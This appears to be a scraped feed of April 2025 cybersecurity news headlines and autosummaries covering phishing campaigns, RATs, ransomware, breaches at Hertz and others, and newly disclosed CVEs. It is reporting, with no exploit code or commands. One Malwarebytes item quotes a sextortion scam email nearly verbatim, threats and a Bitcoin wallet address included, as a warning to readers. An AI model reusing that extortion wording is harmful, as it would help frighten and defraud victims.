    Threat actors are leveraging an artificial intelligence (AI) powered presentation platform named Gamma in phishing attacks to direct unsuspecting users to spoofed Microsoft login pages. "Attackers weaponize Gamma, a relatively new AI-based presentation tool, to deliver a link to a fraudulent Microsoft SharePoint login portal," Abnormal Security researchers Hinman Baron and Piotr Wojtyla said in

    Autosummary: The disclosure comes as Microsoft, in its latest Cyber Signals report, warned of an increase in AI-driven fraud attacks to generate believable content for attacks at scale using deepfakes, voice cloning, phishing emails, authentic-looking fake websites, and bogus job listings.


    New BPFDoor Controller Enables Stealthy Lateral Movement in Linux Server Attacks

    Linux
    2025-04-16 https://thehackernews.com/2025/04/new-bpfdoor-controller-enables-stealthy.html
    Cybersecurity researchers have unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt in 2024. "The controller could open a reverse shell," Trend Micro researcher Fernando Mercês said in a technical report published earlier in

    Autosummary: In the next step, the controller directs the compromised machine to perform one of the below actions based on the password provided and the command-line options used: open a reverse shell; redirect new connections to a shell on a specific port; or confirm the backdoor is active. It's worth pointing out that the password sent by the controller must match one of the hard-coded values in the BPFDoor sample.


    Chinese Android phones shipped with malware-laced WhatsApp, Telegram apps

    exploits
    2025-04-16 https://securityaffairs.com/176600/malware/chinese-android-phones-shipped-with-malware-laced-whatsapp-telegram-apps.html
    Cheap Chinese Android phones ship with trojanized WhatsApp and Telegram clones hiding crypto clippers, active since June 2024. Since June 2024, Doctor Web researchers found cheap Android phones preloaded with fake WhatsApp and Telegram apps designed to steal crypto via clipping. These clippers swap copied wallet addresses with the attackers’ own. The campaign targeted low-end […]

    Autosummary: To protect yourself from such attacks, our virus analysts recommend installing Dr.Web Security Space antivirus for mobile devices, shunning smartphones with features that clearly do not match their price, downloading applications only from trusted sources, such as Google Play, RuStore and AppGallery, and not storing on their devices screenshots with mnemonic phrases, passwords, and keys in unencrypted form.” In June 2014 security experts at G Data discovered that a popular Chinese Android Smartphone, Star N9500, was commercialized with a pre-installed spyware, meanwhile in April, the Chinese TV station, CCTV, reported some cases of smartphones compromised by pre-installed malware before selling them on to unwitting customers.


    Apple fixes two zero-days exploited in targeted iPhone attacks

    exploits
    2025-04-16 https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-exploited-in-targeted-iphone-attacks/
    Apple released emergency security updates to patch two zero-day vulnerabilities that were used in an "extremely sophisticated attack" against specific targets' iPhones. [...]



    Google begins unifying search country domains to Google.com

    government
    2025-04-16 https://www.bleepingcomputer.com/news/google/google-begins-unifying-search-country-domains-to-googlecom/
    Google has announced that it's retiring separate country code top-level domain names like google.co.uk or google.com.br and redirecting users to Google.com. [...]



    “I sent you an email from your email account,” sextortion scam claims

    financial
    2025-04-16 https://www.malwarebytes.com/blog/news/2025/04/i-sent-you-an-email-from-your-email-account-sextortion-scam-claims
    A new variant of the hello pervert emails claims that the target's system is infected with njRAT and spoofs the victim's email address.

    Autosummary: My Bitcoin address (BTC wallet): 1FJg6nuRLLv4iQLNFPTpGwZfKjHJQnmwFs
    After payment is received, I will delete the video and you will not hear from me again
    I’m giving you 48 hours to pay
    Do not forget that I will see you when you open the message, the counter will start
    If I see you’ve shared this message with someone else, the video will be posted immediately”
    If the victim decides to search for “njrat” they’ll find that it’s a remote access trojan (RAT) that has capabilities to log keystrokes, access the victim’s camera, steal credentials stored in browsers, upload/download files, view the victim’s desktop, and more. The text of the email roughly looks like this:
    “As you may have noticed, I sent you an email from your email account
    This means I have full access to your account
    I’ve been watching you for a few months
    The thing is, you got infected with a njrat through an adult site you visited
    If you don’t know about this, let me explain
    The njrat gives me full access and control over your device.


    Google blocked over 5 billion ads in 2024 amid rise in AI-powered scams

    financial
    2025-04-16 https://www.bleepingcomputer.com/news/google/google-blocked-over-5-billion-ads-in-2024-amid-rise-in-ai-powered-scams/
    Google blocked 5.1 billion ads and suspended more than 39.2 million advertiser accounts in 2024, according to its 2024 Ads Safety Report released this week. [...]



    CISA’s 11-Month extension ensures continuity of MITRE’s CVE Program

    ransomware
    2025-04-16 https://securityaffairs.com/176608/security/cisas-11-month-extension-ensures-continuity-of-mitres-cve-program.html
    MITRE’s U.S.-funded CVE program, a core cybersecurity tool for tracking vulnerabilities, faces funding expiry Wednesday, risking disruption to global security. U.S. government funding for MITRE’s CVE program, a key global cybersecurity resource for cataloging vulnerabilities, is set to expire Wednesday, risking disruption. The 25-year-old program has assigned over 274,000 CVE IDs for public security […]

    Autosummary: Pierluigi Paganini, April 16, 2025. MITRE’s U.S.-funded CVE program, a core cybersecurity tool for tracking vulnerabilities, faces funding expiry Wednesday, risking disruption to global security.


    New Windows Task Scheduler Bugs Let Attackers Bypass UAC and Tamper with Logs

    exploits
    2025-04-16 https://thehackernews.com/2025/04/experts-uncover-four-new-privilege.html
    Cybersecurity researchers have detailed four different vulnerabilities in a core component of the Windows task scheduling service that could be exploited by local attackers to achieve privilege escalation and erase logs to cover up evidence of malicious activities. The issues have been uncovered in a binary named "schtasks.exe," which enables an administrator to create, delete, query, change,



    Cybercriminal groups embrace corporate structures to scale, sustain operations

    ciber
    2025-04-15 https://www.helpnetsecurity.com/2025/04/15/sandy-kronenberg-netarx-cybercriminal-groups-corporate-structures/

    In this Help Net Security interview, Sandy Kronenberg, CEO of Netarx, discusses how cybercriminal groups are adopting corporate structures and employee incentives to scale operations, retain talent, and evade detection. He covers the strategic collaborations behind major attacks, business-like parallels, and the implications of these shifts as these groups grow more sophisticated. What motivates cybercriminal groups to adopt mainstream corporate structures and employee incentives, and what impact does this have on recruitment and retention? Loose, …

    The post Cybercriminal groups embrace corporate structures to scale, sustain operations appeared first on Help Net Security.


    Autosummary: In this Help Net Security interview, Sandy Kronenberg, CEO of Netarx, discusses how cybercriminal groups are adopting corporate structures and employee incentives to scale operations, retain talent, and evade detection. Furthermore, it is reported that their team is given access to tools, training, vacation and sick-time, and health benefits, similar to employees at traditional corporations. These groups often start with an ideology that is politically motivated, but after some success, members often want financial gain, causing fractures, schisms, or name changes.


    Chief Legal Officers step up in cybersecurity oversight

    ciber
    2025-04-15 https://www.helpnetsecurity.com/2025/04/15/chief-legal-officers-cybersecurity-video/

    In this Help Net Security video, Jennifer Chen, Executive Director of the Association of Corporate Counsel (ACC) Foundation, discusses how globally, Chief Legal Officers (CLOs) are becoming integral leaders in cybersecurity strategy, holding leadership positions, and frequently reporting cybersecurity strategies to the company board. According to the ACC Foundation, the findings highlight a significant shift in how cybersecurity is viewed through a legal and governance lens. Key findings include: Half of CLOs (50%) are part …

    The post Chief Legal Officers step up in cybersecurity oversight appeared first on Help Net Security.




    Cybersecurity jobs available right now: April 15, 2025

    ciber
    2025-04-15 https://www.helpnetsecurity.com/2025/04/15/cybersecurity-jobs-available-right-now-april-15-2025/

    CISO Department of Justice | Australia | On-site – View job details As a CISO, you will be responsible for developing and implementing a cyber security strategy as well as establishing and maintaining the organisation’s strategic enterprise-wide information and cyber security management program. Cloud Security Architect Kinaxis | Canada | Remote – View job details As a Cloud Security Architect, you will design secure patterns for workloads deployed on Infrastructure-as-a-Service, Platform-as-a-Service and Software-as-a-Service environments, …

    The post Cybersecurity jobs available right now: April 15, 2025 appeared first on Help Net Security.


    Autosummary: VP, Security Clio | Canada | Hybrid – View job details As a VP, Security, you will design, implement, and mature an enterprise-level risk management framework, including supporting policies, procedures, and standards.
    Senior Consultant Cyber Cloud Security Deloitte | Germany | On-site – View job details As a Senior Consultant Cyber Cloud Security, you will design cloud architectures, solutions, and processes for secure landing zones, cloud authentication, cloud security incident and risk management, et al.
    Cloud Security Architect Kinaxis | Canada | Remote – View job details As a Cloud Security Architect, you will design secure patterns for workloads deployed on Infrastructure-as-a-Service, Platform-as-a-Service and Software-as-a-Service environments, as well as hybrid architecture patterns, which may tightly integrate to other public clouds or on-premises systems.
    Cyber Security Engineer Berkeley Lab | USA | On-site – View job details As a Cyber Security Engineer, you will perform security duties including monitoring for potential threats, proactively examining network traffic and log data, investigating anomalous activity, forensic analysis, and resolution of security incidents.


    Gladinet’s Triofox and CentreStack Under Active Exploitation via Critical RCE Vulnerability

    exploits
    2025-04-15 https://thehackernews.com/2025/04/gladinets-triofox-and-centrestack-under.html
    A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven different organizations compromised to date. Tracked as CVE-2025-30406 (CVSS score: 9.0), the vulnerability refers to the use of a hard-coded cryptographic key that could expose internet-accessible servers to remote code execution attacks.



    Seemplicity adds AI-driven capabilities to scale remediation operations

    government
    2025-04-15 https://www.helpnetsecurity.com/2025/04/15/seemplicity-platform-ai-driven-capabilities/

    Seemplicity announced a major product release. This latest version of the Seemplicity Platform introduces powerful new AI-driven capabilities designed to streamline and scale remediation operations. Two major new features – called “Find the Fixer” and “Automatic Scoping” – reduce remediation chaos by eliminating manual bottlenecks and significantly accelerate the path from detection to resolution. Security teams face inadequate prioritization, misrouted remediation requests, and manual workflows that slow down progress. Legacy exposure management requires constant upkeep … More

    The post Seemplicity adds AI-driven capabilities to scale remediation operations appeared first on Help Net Security.


    Autosummary: Key benefits include: AI-powered tag discovery from incomplete or inconsistent data; dynamic grouping aligned to real business context; faster prioritization and routing of exposures; and scalable segmentation that evolves with the organization. Scalable, intelligent exposure management: Together, these capabilities provide a scalable, intelligent approach to remediation, ensuring vulnerabilities and exposures don’t just get detected, but resolved.


    Hertz disclosed a data breach following 2024 Cleo zero-day attack

    financial exploits
    2025-04-15 https://securityaffairs.com/176562/data-breach/hertz-disclosed-a-data-breach-following-2024-cleo-zero-day-attack.html
    Hertz Corporation disclosed a data breach after customer data was stolen via Cleo zero-day exploits in late 2024, affecting Hertz, Thrifty, and Dollar brands. Car rental giant Hertz Corporation disclosed a data breach that impacted its Hertz, Thrifty, and Dollar brands. Threat actors gained access to customer data via Cleo zero-day exploits in late 2024. […] "



    Gladinet flaw CVE-2025-30406 actively exploited in the wild

    exploits
    2025-04-15 https://securityaffairs.com/176552/hacking/gladinet-flaw-cve-2025-30406-actively-exploited-in-the-wild.html
    Huntress reports active exploitation of Gladinet CVE-2025-30406 in the wild, affecting seven organizations and 120 endpoints. Security researchers at Huntress warn of attacks in the wild exploiting a critical vulnerability, tracked as CVE-2025-30406, in Gladinet CentreStack and Triofox software. The vulnerability CVE-2025-30406 (CVSS score 9.0) is a deserialization issue due to the CentreStack portal’s hardcoded machineKey use. […] "

    Autosummary: “We don’t have any intentions of sharing the proof-of-concept to embolden other adversaries, but once an external exploit is shared publicly we will update this blog to include the technical details of recreating the attack script,” the report continues.


    Crypto Developers Targeted by Python Malware Disguised as Coding Challenges

    exploits
    2025-04-15 https://thehackernews.com/2025/04/crypto-developers-targeted-by-python.html
    The North Korea-linked threat actor assessed to be behind the massive Bybit hack in February 2025 has been linked to a malicious campaign that targets developers to deliver new stealer malware under the guise of a coding assignment. The activity has been attributed by Palo Alto Networks Unit 42 to a hacking group it tracks as Slow Pisces, which is also known as Jade Sleet, PUKCHONG, "

    Autosummary: This includes system metadata, installed applications, directory listing, and the top-level contents of the victim’s home directory, iCloud Keychain, stored SSH keys, and configuration files for AWS, Kubernetes, and Google Cloud.


    Minister’s X account hacked to promote crypto scam

    financial
    2025-04-15 https://www.bbc.com/news/articles/cr5drp0n8zjo
    The MP’s office says "steps were taken quickly to secure the account and remove misleading posts".

    Autosummary: Luke Nolan, a senior research associate at CoinShares, an asset management company specialising in digital assets, said the hack of Powell’s account was an example of "pump and dump".


    Hertz data breach caused by CL0P ransomware attack on vendor

    financial exploits ransomware
    2025-04-15 https://www.malwarebytes.com/blog/news/2025/04/hertz-data-breach-caused-by-cl0p-ransomware-attack-on-vendor
    Car rental giant Hertz suffered a data breach caused by a CL0P ransomware attack on file sharing vendor Cleo.

    Autosummary: The type of stolen data varies per customer, but could include: name, contact information, driver’s license, and Social Security Number (in rare cases, according to Hertz). “A very small number of individuals may have had their Social Security or other government identification numbers, passport information, Medicare or Medicaid ID (associated with workers’ compensation claims), or injury-related information associated with vehicle accident claims impacted by the event.” The Hertz Corporation, on behalf of Hertz, Dollar, and Thrifty brands, is sending breach notifications to customers who may have had their name, contact information, driver’s license, and—in rare cases—Social Security Number exposed in a data breach. In 2024, CL0P repeated this method using a zero-day exploit against Cleo, a business-to-business (B2B) tech platform provider that specializes in managed file transfer (MFT) solutions, like Cleo Harmony, VLTrader, and LexiCom.


    RansomHouse ransomware: what you need to know

    exploits ransomware
    2025-04-15 https://www.fortra.com/blog/ransomhouse-ransomware-what-you-need-know
    RansomHouse is a cybercrime operation that follows a Ransomware-as-a-Service (RaaS) business model, where affiliates (who do not require technical skills of their own) use the ransomware operator’s infrastructure to extort money from victims. Read more in my article on the Fortra blog.

    Autosummary: RansomHouse has made a name for itself by attacking organisations in education, government, manufacturing, and healthcare, including the likes of AMD, the University of Paris-Saclay, Bulgaria’s Supreme Administrative Court, and South African telecoms operator Cell C. And do these organisations pay up? In the example above, RansomHouse has linked to "evidence packs" and even a "full data dump" belonging to one of their victims, meaning that anyone can download the stolen data - without even requiring a password.


    Hertz data breach: Customers in US, EU, UK, Australia and Canada affected

    financial
    2025-04-15 https://www.helpnetsecurity.com/2025/04/15/hertz-data-breach-customers-in-us-eu-uk-australia-and-canada-affected/

    American car rental company Hertz has suffered a data breach linked to last year’s exploitation of Cleo zero-day vulnerabilities by a ransomware gang. The breach resulted in the information of an unknown number of customers of Hertz and of Hertz’s subsidiaries Dollar and Thrifty being compromised. Hertz data breach notifications: “Cleo is a vendor that provides a file transfer platform used by Hertz for limited purposes,” the company shared – though it did not specify what … More

    The post Hertz data breach: Customers in US, EU, UK, Australia and Canada affected appeared first on Help Net Security.




    Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool

    exploits Linux
    2025-04-15 https://thehackernews.com/2025/04/chinese-hackers-target-linux-systems.html
    The China-linked threat actor known as UNC5174 has been attributed to a new campaign that leverages a variant of a known malware dubbed SNOWLIGHT and a new open-source tool called VShell to infect Linux systems. "Threat actors are increasingly using open source tools in their arsenals for cost-effectiveness and obfuscation to save money and, in this case, plausibly blend in with the pool of "

    Autosummary: The attacks, the Taiwanese cybersecurity company said, targeted a multitude of sectors spanning nearly 20 different countries such as Austria, Australia, France, Spain, Japan, South Korea, Netherlands, Singapore, Taiwan, the United Arab Emirates, the United Kingdom, and the United States. "


    Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence

    exploits
    2025-04-15 https://thehackernews.com/2025/04/critical-apache-roller-vulnerability.html
    A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain unauthorized access even after a password change. The flaw, assigned the CVE identifier CVE-2025-24859, carries a CVSS score of 10.0, indicating maximum severity. It affects all versions of Roller up to and including 6.1.4. "



    Peru’s ex-President Ollanta Humala guilty of money laundering

    financial latam
    2025-04-15 https://www.bbc.com/news/articles/c33z6kn7xvyo
    A court ruled that Humala, who governed Peru from 2011 to 2016, took illegal campaign contributions. "



    Midnight Blizzard deploys new GrapeLoader malware in embassy phishing

    financial exploits
    2025-04-15 https://www.bleepingcomputer.com/news/security/midnight-blizzard-deploys-new-grapeloader-malware-in-embassy-phishing/
    Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies. [...] "

    Autosummary: A pour of malware: The phishing campaign started in January 2025 and begins with an email spoofing a Ministry of Foreign Affairs, sent from "bakenhof[.]com" or "silry[.]com," inviting the recipient to a wine-tasting event.


    Landmark Admin data breach impact now reaches 1.6 million people

    financial
    2025-04-15 https://www.bleepingcomputer.com/news/security/landmark-admin-data-breach-impact-now-reaches-16-million-people/
    Landmark Admin has issued an update to its investigation of a cyberattack it suffered in May 2024, increasing the number of impacted individuals to 1.6 million. [...] "



    The quiet data breach hiding in AI workflows

    financial
    2025-04-14 https://www.helpnetsecurity.com/2025/04/14/quiet-data-breach-ai-workflows/

    As AI becomes embedded in daily business workflows, the risk of data exposure increases. Prompt leaks are not rare exceptions. They are a natural outcome of how employees use large language models. CISOs cannot treat this as a secondary concern. To reduce risk, security leaders should focus on policy, visibility, and culture. Set clear rules about what data can and cannot be entered into AI systems. Monitor usage to identify shadow AI before it becomes … More

    The post The quiet data breach hiding in AI workflows appeared first on Help Net Security.


    Autosummary: Understanding prompt leaks: Prompt leaks happen when sensitive data, such as proprietary information, personal records, or internal communications, is unintentionally exposed through interactions with LLMs. Researchers found that many inputs posed some level of data leakage risk, including personal identifiers, financial data, and business-sensitive information. These kinds of exposures carry real risks. Regulatory fallout: If personally identifiable information (PII) or protected health information (PHI) is exposed through prompts, it could trigger violations under GDPR, HIPAA, or other data protection laws. Mitigation strategies: “The way to avoid leaks is not to avoid training LLMs on company data, but rather making sure that only people with appropriate access and sufficient levels of trust can use such LLMs within the organization,” said Or Eshed, CEO of LayerX. Eshed recommended a tiered approach for enterprises looking to tighten AI security.


    Sector by sector: How data breaches are wrecking bottom lines

    financial
    2025-04-14 https://www.helpnetsecurity.com/2025/04/14/data-breaches-costs/

    Data breaches are rising across industries, hitting healthcare, finance, and retail especially hard. The damage goes beyond lost data, as it’s financial, operational, and reputational.

    The post Sector by sector: How data breaches are wrecking bottom lines appeared first on Help Net Security.


    Autosummary: The action plan proposes, among others, for ENISA, the EU agency for cybersecurity, to establish a pan-European Cybersecurity Support Centre for hospitals and healthcare providers, providing them with tailored guidance, tools, services, and training. Factors contributing to rising costs: Several factors are driving up the costs associated with data breaches. Business disruption: Breaches often lead to significant operational downtime, resulting in lost revenue and decreased productivity. “As recent events have shown, this harm extends beyond a loss in patient volume to include financial repercussions, such as downgrades in bond ratings,” Aaron Weismann, CISO at Main Line Health, explained. Strategies to mitigate data breach costs: To reduce the financial impact of data breaches, organizations should:


    Malwarebytes named “Best Antivirus Software” and “Best Malware Removal Service”

    exploits
    2025-04-14 https://www.malwarebytes.com/blog/product/2025/04/malwarebytes-named-best-antivirus-software-and-best-malware-removal-service
    Malwarebytes has been rewarded with prestigious accolades by two renowned publications, PCMag and CNET. "



    Medusa ransomware gang claims to have hacked NASCAR

    exploits ransomware
    2025-04-14 https://www.bitdefender.com/en-us/blog/hotforsecurity/medusa-ransomware-hacked-nascar
    Read more in my article on the Hot for Security blog. "

    Autosummary: In an attempt to verify its claim of having hacked NASCAR, Medusa has published screenshots of what it claims are internal documents - including some purporting to show the names, email addresses, and phone numbers of NASCAR employees and sponsors, as well as invoices, financial reports, and more. "


    Tycoon2FA phishing kit rolled out significant updates

    financial
    2025-04-14 https://securityaffairs.com/176521/cyber-crime/tycoon2fa-phishing-kit-rolled-out-significant-updates.html
    The operators of the Phishing-as-a-Service (PhaaS) platform Tycoon2FA have rolled out significant updates to enhance its evasion capabilities. Tycoon2FA, a phishing kit discovered in 2023 by cybersecurity firm Sekoia, was recently updated to improve its evasion capabilities. The phishing kit now uses advanced evasion tactics such as a custom CAPTCHA via HTML5 canvas, invisible Unicode […] "

    Autosummary: The Phishing-as-a-Service platform uses anti-debugging scripts to block dev tools, detect automation, prevent right-click, and spot paused execution. "


    South African telecom provider Cell C disclosed a data breach following a cyberattack

    financial ciber Telcos
    2025-04-14 https://securityaffairs.com/176509/data-breach/south-african-telecom-provider-cell-c-disclosed-a-data-breach.html
    Cell C, one of the biggest telecom providers in South Africa, confirms a data breach following a 2024 cyberattack. Cell C is the fourth-largest mobile network operator in South Africa, after Vodacom, MTN, and Telkom. The company, founded in 2001, offers prepaid and postpaid mobile plans, data bundles and internet services, fiber broadband, roaming and […]

    Autosummary: Compromised data includes full names, contact details, ID numbers, banking information, driver’s license numbers, medical records and passport details.


    ⚡ Weekly Recap: Windows 0-Day, VPN Exploits, Weaponized AI, Hijacked Antivirus and More

    exploits
    2025-04-14 https://thehackernews.com/2025/04/weekly-recap-windows-0-day-vpn-exploits.html
    Attackers aren’t waiting for patches anymore — they are breaking in before defenses are ready. Trusted security tools are being hijacked to deliver malware. Even after a breach is detected and patched, some attackers stay hidden. This week’s events show a hard truth: it’s not enough to react after an attack. You have to assume that any system you trust today could fail tomorrow. In a world "

    Autosummary: This week’s list includes — CVE-2025-3102 (OttoKit plugin), CVE-2025-23359 (NVIDIA Container Toolkit), CVE-2025-30406 (Gladinet CentreStack), CVE-2025-29824 (Windows Common Log File System), CVE-2024-48887 (Fortinet FortiSwitch), CVE-2024-53150, CVE-2024-53197 (Google Android), CVE-2025-2945 (pgAdmin), CVE-2025-2244 (Bitdefender GravityZone), CVE-2025-31334 (WinRAR), CVE-2025-30401 (WhatsApp for Windows), CVE-2025-23120 (Rockwell Automation Industrial Data Center), CVE-2025-25211, CVE-2025-26689 (Inaba Denki Sangyo CHOCO TEI WATCHER), CVE-2024-4872, CVE-2024-3980 (Hitachi Energy MicroSCADA Pro/X SYS600), CVE-2025-2636 (InstaWP Connect – 1-click WP Staging & Migration plugin), CVE-2025-3439 (Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin), and CVE-2025-31565 (WPSmartContracts plugin).

    Flaws Uncovered in Perplexity’s Android App — An analysis of Perplexity AI’s Android app has uncovered a set of 11 flaws, including hard-coded API keys, cross-origin resource sharing (CORS) misconfigurations, lack of SSL pinning, unsecured network configuration, tapjacking, and susceptibility to known flaws like Janus and StrandHogg, exposing users of the app to risks such as data theft, account takeovers, and reverse engineering attacks.

    According to PRODAFT, Medialand has been linked to Yalishanda (LARVA-34), with the service playing a key role in enabling a wide range of cybercriminal operations, including hosting ransomware infrastructure for Black Basta, malware C2 servers, code-signing systems, phishing kits, data exfiltration panels, and data leak sites.

    The surge in attacks began on March 31, 2025, with over 6,600 unique IP addresses, mainly from Taiwan, Japan, and South Korea, targeting systems located in the United States, United Kingdom, and Germany, attempting to exploit the flaw over the past 30 days.

    AWS Debuts Support for ML-KEM in KMS, ACM, and Secrets Manager — Amazon Web Services (AWS) has announced support for Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM) for hybrid post-quantum key agreement in Key Management Service (AWS KMS), Certificate Manager (ACM), and Secrets Manager.

    The Black Basta chat dataset shed light on the group’s "internal workflows, decision-making processes, and team dynamics, offering an unfiltered perspective on how one of the most active ransomware groups operates behind the scenes," Trustwave said.

    Leaked internal data reveals a treasure trove of information about who bought servers, who paid (including via cryptocurrency), and possibly personally identifiable information (PII), not to mention allowing defenders to correlate indicators of compromise (IoCs) and improve attribution efforts.

    Chinese officials acknowledged in a secret meeting in December 2024 that China was behind a series of cyber attacks aimed at U.S. critical infrastructure, a cluster of activity that’s known as Volt Typhoon, the Wall Street Journal reported, citing people familiar with the matter.


    Cybersecurity in the AI Era: Evolve Faster Than the Threats or Get Left Behind

    ciber
    2025-04-14 https://thehackernews.com/2025/04/cybersecurity-in-ai-era-evolve-faster.html
    AI is changing cybersecurity faster than many defenders realize. Attackers are already using AI to automate reconnaissance, generate sophisticated phishing lures, and exploit vulnerabilities before security teams can react. Meanwhile, defenders are overwhelmed by massive amounts of data and alerts, struggling to process information quickly enough to identify real threats. AI offers a way to "

    Autosummary: The event will take place June 16-21, 2025, in Washington, D.C., bringing together top cybersecurity professionals for hands-on training, live labs, and expert-led discussions. "


    New ResolverRAT malware targets pharma and healthcare orgs worldwide

    exploits
    2025-04-14 https://www.bleepingcomputer.com/news/security/new-resolverrat-malware-targets-pharma-and-healthcare-orgs-worldwide/
    A new remote access trojan (RAT) called "ResolverRAT" is being used against organizations globally, with the malware used in recent attacks targeting the healthcare and pharmaceutical sectors. [...] "

    Autosummary: At the same time, it also adds itself to filesystem locations like "Startup," "Program Files," and "LocalAppData." (Figure: Registry-based persistence. Source: Morphisec.) ResolverRAT attempts to connect at scheduled callbacks at random intervals to evade detection based on irregular beaconing patterns.


    Kidney dialysis firm DaVita hit by weekend ransomware attack

    exploits ransomware
    2025-04-14 https://www.bleepingcomputer.com/news/security/kidney-dialysis-firm-davita-hit-by-weekend-ransomware-attack/
    Kidney dialysis firm DaVita disclosed Monday it suffered a weekend ransomware attack that encrypted parts of its network and impacted some of its operations. [...] "

    Autosummary: "On April 12, 2025, DaVita Inc. became aware of a ransomware incident that has encrypted certain elements of our network," reads the 8-K filing. "


    ResolverRAT Campaign Targets Healthcare, Pharma via Phishing and DLL Side-Loading

    financial
    2025-04-14 https://thehackernews.com/2025/04/resolverrat-campaign-targets-healthcare.html
    Cybersecurity researchers have discovered a new, sophisticated remote access trojan called ResolverRAT that has been observed in attacks targeting healthcare and pharmaceutical sectors. "The threat actor leverages fear-based lures delivered via phishing emails, designed to pressure recipients into clicking a malicious link," Morphisec Labs researcher Nadav Lorber said in a report shared with The "

    Autosummary: This includes Hindi, Italian, Czech, Turkish, Portuguese, and Indonesian, indicating the threat actor’s attempts to cast a wide net through region-specific targeting and maximize infection rates.


    Phishing Campaigns Use Real-Time Checks to Validate Victim Emails Before Credential Theft

    financial
    2025-04-14 https://thehackernews.com/2025/04/phishing-campaigns-use-real-time-checks.html
    Cybersecurity researchers are calling attention to a new type of credential phishing scheme that ensures that the stolen information is associated with valid online accounts. The technique has been codenamed precision-validating phishing by Cofense, which it said employs real-time email validation so that only a select set of high-value targets are served the fake login screens. "This tactic not "

    Autosummary: Unlike "spray-and-pray" credential harvesting campaigns that typically involve the bulk distribution of spam emails to obtain victims’ login information in an indiscriminate fashion, the latest attack tactic takes spear-phishing to the next level by only engaging with email addresses that attackers have verified as active, legitimate, and high-value.


    Govtech giant Conduent confirms client data stolen in January cyberattack

    ciber
    2025-04-14 https://www.bleepingcomputer.com/news/security/govtech-giant-conduent-confirms-client-data-stolen-in-january-cyberattack/
    American business services giant and government contractor Conduent disclosed today that client data was stolen in a January 2025 cyberattack. [...] "



    Cybersecurity firm buying hacker forum accounts to spy on cybercriminals

    ciber
    2025-04-14 https://www.bleepingcomputer.com/news/security/cybersecurity-firm-buying-hacker-forum-accounts-to-spy-on-cybercriminals/
    Swiss cybersecurity firm Prodaft has launched a new initiative called "Sell your Source" where the company purchases verified and aged accounts on hacking forums to spy on cybercriminals. [...]

    Autosummary: "As a threat intelligence company, we specialize in obtaining visibility into the infrastructures of cybercriminals, searching for patterns, tactics, techniques, and procedures that help us understand adversarial networks and detect and mitigate potential cyberattacks," explains Prodaft. "


    New malware ‘ResolverRAT’ targets healthcare, pharmaceutical firms

    exploits
    2025-04-14 https://securityaffairs.com/176537/malware/new-malware-resolverrat-targets-healthcare-pharmaceutical-firms.html
    New malware ‘ResolverRAT’ is targeting healthcare and pharmaceutical firms, using advanced capabilities to steal sensitive data. Morphisec researchers discovered a new malware dubbed ‘ResolverRAT’ that is targeting healthcare and pharmaceutical firms, using advanced capabilities to steal sensitive data. ResolverRAT spreads via phishing emails using localized languages and legal lures. Victims download a malicious file triggering […] "



    Hertz confirms customer info, drivers’ licenses stolen in data breach

    financial
    2025-04-14 https://www.bleepingcomputer.com/news/security/hertz-confirms-customer-info-drivers-licenses-stolen-in-data-breach/
    Car rental giant Hertz Corporation warns it suffered a data breach after customer data for its Hertz, Thrifty, and Dollar brands was stolen in the Cleo zero-day data theft attacks. [...] "

    Autosummary: The company says that the data varies per individual but could contain customers’ names, contact information, date of birth, credit card information, driver’s license information, and information related to workers’ compensation claims.


    Week in review: Microsoft patches exploited Windows CLFS 0-day, WinRAR MotW bypass flaw fixed

    exploits
    2025-04-13 https://www.helpnetsecurity.com/2025/04/13/week-in-review-microsoft-patches-exploited-windows-clfs-0-day-winrar-motw-bypass-flaw-fixed/

    Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Microsoft fixes actively exploited Windows CLFS zero-day (CVE-2025-29824) April 2025 Patch Tuesday is here, and Microsoft has delivered fixes for 120+ vulnerabilities, including a zero-day (CVE-2025-29824) that’s under active attack. WinRAR MotW bypass flaw fixed, update ASAP (CVE-2025-31334) WinRAR users, upgrade your software as soon as possible: a vulnerability (CVE-2025-31334) that could allow attackers to bypass Windows’ Mark of the … More

    The post Week in review: Microsoft patches exploited Windows CLFS 0-day, WinRAR MotW bypass flaw fixed appeared first on Help Net Security.


    Autosummary: Why security culture is crypto’s strongest asset In this Help Net Security interview, Norah Beers, CISO at Grayscale, discusses key security challenges in managing crypto assets, adversary tactics, private key management, and securing both hot and cold wallets. New infosec products of the week: April 11, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Forescout, Index Engines, Jit, RunSafe Security, and Seal Security. Transforming cybersecurity into a strategic business enabler In this Help Net Security interview, Kevin Serafin, CISO at Ecolab, discusses aligning security strategy with long-term business goals, building strong partnerships across the organization, and approaching third-party risk with agility. "


    China admitted its role in Volt Typhoon cyberattacks on U.S. infrastructure

    ciber
    2025-04-13 https://securityaffairs.com/176485/apt/china-admitted-its-role-in-volt-typhoon-cyberattacks-on-u-s-infrastructure.html
    China admitted in a secret meeting with U.S. officials that it conducted Volt Typhoon cyberattacks on U.S. infrastructure, WSJ reports. China reportedly admitted in a secret meeting with U.S. officials that it carried out cyberattacks on U.S. infrastructure, linked to the Volt Typhoon campaign. According to the Wall Street Journal, at a December Geneva summit, […] "

    Autosummary: In the most recent campaign, the group targeted organizations in the communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education sectors. "


    SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 41

    exploits
    2025-04-13 https://securityaffairs.com/176503/malware/security-affairs-malware-newsletter-round-41.html
    Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Lazarus Expands Malicious npm Campaign: 11 New Packages Add Malware Loaders and Bitbucket Payloads; BadBazaar: iOS and Android Surveillanceware by China’s APT15 Used to Target Tibetans and Uyghurs; GOFFEE continues to attack organizations in Russia; Atomic […] "

    Autosummary: "


    Peru's president avoids impeachment over "Rolexgate" scandal

    latam
